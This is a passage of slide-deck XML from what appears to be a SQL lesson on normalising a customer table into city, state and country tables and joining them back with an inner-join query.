                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1500"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1150">
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>CustomerID</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="76200" marB="76200" marR="76200" marL="152400"/>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CustomerName</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>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Address</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>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PostalCode</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>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City</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>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State</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>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Country</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="6489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ANIL</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Bagicha No 06, Rajeev Nagar</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>458441</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Neemuch</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Madhya Pradesh</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>India</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="6489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Robert</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123,xyz</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98797</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Texas</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California</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USA</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2881" name="Google Shape;2881;p467"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3278400" y="856225"/>
            <a:ext cx="2960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rPr>
              <a:t>Final Output</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2886" name="Google Shape;2886;p468"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5884750" y="2624650"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="637575"/>
                <a:gridCol w="2055325"/>
              </a:tblGrid>
              <a:tr h="510475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1500"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1500"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1150">
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="76200" marB="76200" marR="76200" marL="152400"/>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Country</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="44242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India</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="4424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USA</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="44242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UK</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2887" name="Google Shape;2887;p468"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="112450" y="148825"/>
            <a:ext cx="39924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rPr>
              <a:t>Individual</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tables</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2888" name="Google Shape;2888;p468"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4589738" y="179175"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="428600"/>
                <a:gridCol w="1715175"/>
              </a:tblGrid>
              <a:tr h="440850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1500"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1500"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1150">
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="76200" marB="76200" marR="76200" marL="152400"/>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State</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="3820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Texas</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="38207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London</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="38207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Madhya Pradesh</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="382075">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California</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2889" name="Google Shape;2889;p468"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="163150" y="2174475"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="428600"/>
                <a:gridCol w="884425"/>
                <a:gridCol w="750550"/>
                <a:gridCol w="750550"/>
                <a:gridCol w="750550"/>
                <a:gridCol w="750550"/>
              </a:tblGrid>
              <a:tr h="445425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1500"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1500"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1150">
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="76200" marB="76200" marR="76200" marL="152400"/>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cust_name</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>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address</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>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city_id</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>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state_id</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>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cont_id</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="50905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Robert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123,xyz</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>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4</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a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="122177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Anil</a:t>
                      </a:r>
                      <a:endParaRPr>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Bagicha No 06, Rajeev Nagar</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <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3</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1</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2890" name="Google Shape;2890;p468"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623075" y="1663950"/>
            <a:ext cx="1986900" cy="3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cust_tbl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2891" name="Google Shape;2891;p468"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6844875" y="148825"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="532075"/>
                <a:gridCol w="1715175"/>
              </a:tblGrid>
              <a:tr h="579525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1500"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1500"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1150">
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="76200" marB="76200" marR="76200" marL="152400"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1150">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>City</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1150">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="502275">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Texas</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="50227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Neemuch</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="502275">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Pune</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2896" name="Google Shape;2896;p469"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2520100" y="343825"/>
            <a:ext cx="39924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rPr>
              <a:t>Solution</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2897" name="Google Shape;2897;p469"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="11129" l="0" r="0" t="60140"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1096124"/>
            <a:ext cx="9144000" cy="1477702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2898" name="Google Shape;2898;p469"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="38175" y="2740925"/>
            <a:ext cx="8792100" cy="20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select customer_tbl.cid as CustomerID,customer_tbl.cust_name as CustomerName,customer_tbl.address as Address,city_tbl.city_name as City,state_tbl.state_name as State,country_tbl.country_name as Country from customer_tbl inner join city_tbl inner join state_tbl inner join country_tbl  ON customer_tbl.city_id=city_tbl.id AND customer_tbl.state_id=state_tbl.id AND customer_tbl.country_id=country_tbl.id;</a:t>
            </a:r>
            <a:endParaRPr/>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2" name="Shape 2902"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2903" name="Google Shape;2903;p4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FK = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Foreign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Key</a:t>
            </a:r>
            <a:endParaRPr/>
